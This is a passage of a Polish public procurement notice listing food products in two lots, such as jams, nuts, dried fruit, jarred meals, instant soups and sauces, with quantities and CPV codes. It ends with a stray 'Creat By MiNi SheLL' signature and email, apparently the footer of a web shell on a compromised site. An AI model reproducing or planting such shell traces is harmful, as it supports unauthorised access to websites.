14) Sałatka warzywna  w opakowaniu szklanym (słoik) od 800g do 900g -składniki: warzywa  (ogórek ,marchew,cebula,papryka) woda ,ocet-regulator kwasowości,cukier,sól,  naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań.  CPV: 15331000-7
15) Sałatka szwedzka  w opakowaniu szklanym (słoik) od 800g do 900g -składniki:warzywa  (ogórek,cebula) woda ,ocet-regulator kwasowości,cukier,sól,  naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań CPV: 15331000-7
16) Dżem wiśniowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332294-1.
17) Dżem truskawkowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332296-5.
18) Dżem jagodowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332290-3.
19) Dżem truskawkowy, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332296-5.
20) Dżem z czarnej porzeczki, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332293-4.
21) Dżem brzoskwiniowy, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332290-3.
22) Rodzynki, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2800 opakowań. CPV: 15332412-5.
23) Pestki dyni, w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 03211900-2.
24) Słonecznik prażony, w opakowaniu od 45 g do 55 g., ilość szacunkowa 1500 opakowań. CPV: 03211900-2.
25) Słonecznik łuskany, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2400 opakowań. CPV: 03211900-2.
26) Fistaszki (orzeszki ziemne niełuskane), w opakowaniu od 900 g do 1000 g, ilość szacunkowa 1600 opakowań. CPV: 15332300-7.
27) Orzeszki solone, w opakowaniu od 90 g do 110 g (nie w puszce), ilość szacunkowa 1200 opakowań. CPV: 15332310-0.

28) Śliwka suszona kalifornijska w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000   opakowań. CPV: 15332410-1.
29) Morela suszona w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 15332410-1.
30) Daktyle suszone drylowane w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 15332410-1.
31) Orzechy włoskie łuskane w opakowaniu 200 g, ilość szacunkowa 1500 szt. CPV: 15332300-7.
32) Orzeszki laskowe łuskane w opakowaniu 200 g, ilość szacunkowa 1500 szt. CPV: 15332300-7..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.15.00-0, 15.89.43.00-0, 15.33.11.36-9, 15.33.23.00-7, 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Pulpety z mięsa wieprzowego w sosie pomidorowym, w opakowaniu szklanym (słoik) od 450 g do 550 g, ilość szacunkowa 3000 opakowań. CPV: 15894300-4.
2) Gołąbki w sosie pomidorowym w opakowaniu szklanym (słoik) od 450 g do 550 g,  ilość szacunkowa 2000 opakowań, skład m. in.: mięso wieprzowo-wołowe, ryż, kapusta. CPV: 15894300-4.
3) Kotlety sojowe a la schabowe, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2500 opakowań. CPV: 15894300-4.
4) Flaki w sosie pomidorowym w opakowaniu szklanym od 450 g do 550 g, ilość szacunkowa 1500 opakowań. CPV:15894300-4.
5) Fasolka po bretońsku z kiełbasą w sosie pomidorowym w opakowaniu szklanym (słoik) od 450 g do 550 g, ilość szacunkowa 2500 opakowań. CPV:15894300-4.
6) Zupa - barszcz czerwony Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150 g, ilość szacunkowa 600 opakowań. CPV: 15891400-4.
7) Zupa - rosół z kury Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150 g, ilość szacunkowa 600 opakowań. CPV: 15891500-4.
8) Zupa błyskawiczna z makaronem ostra o smaku kurczaka Vifon kurczak curry, w opakowaniu 70 g, ilość szacunkowa 25200 opakowań. CPV: 15891400-4.
9) Zupa instant Amino - różne smaki, w opakowaniu od 60 g do 70 g, ilość szacunkowa 10000 opakowań. CPV: 15891400-4.
10) Zupa Knorr gorący kubek - różne smaki, w opakowaniu od 15 g do 21 g, ilość szacunkowa 2500 opakowań. CPV: 15891400-4.
11) Gorący kubek Knorr danie instant - różne smaki, dania gotowe w kubeczku plastikowym do zalania gorącą wodą, ilość szacunkowa 1000 opakowań. CPV: 15894300-4.
12) Rosół z kury w kostce Knorr, w opakowaniu po 6 kostek po 10 g, ilość szacunkowa 1000 opakowań. CPV: 15891400-4.
13) Sos boloński Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1500 opakowań. CPV: 15871260-4.
14) Sos słodko-kwaśny Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa  1500 opakowań. CPV: 15871260-4.
15) Sos meksykański Łowicz, w opakowaniu szklanym (słoik)  300 g, ilość szacunkowa 1500 opakowań. CPV: 15871260-4.
16) Sos bolognese z ziołami Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2000 opakowań. CPV: 15871260-4.
17) Sos węgierski z pieczarkami Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2400 opakowań. CPV: 15871260-4.
18) Sos meksykański Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2400 opakowań. CPV: 15871260-4.
19) Sos czosnkowy Winiary, w opakowaniu szklanym (słoik) 250 ml, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
20) Sos tatarski Winiary, w opakowaniu szklanym (słoik) 250 ml, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
21) Sos pomidorowy Cykoria, w opakowaniu 50 g, ilość szacunkowa 3000 opakowań. CPV: 15871260-4.
22) Sos boloński Amino kuchnia polska, w opakowaniu 43 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
23) Sos pieczarkowy w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
24) Sos pieczeniowy jasny w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
25) Sos pieczeniowy ciemny w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
26) Sos sałatkowy 9 g, ilość szacunkowa 800 szt. CPV: 15871260-4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4, 15.87.12.60-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com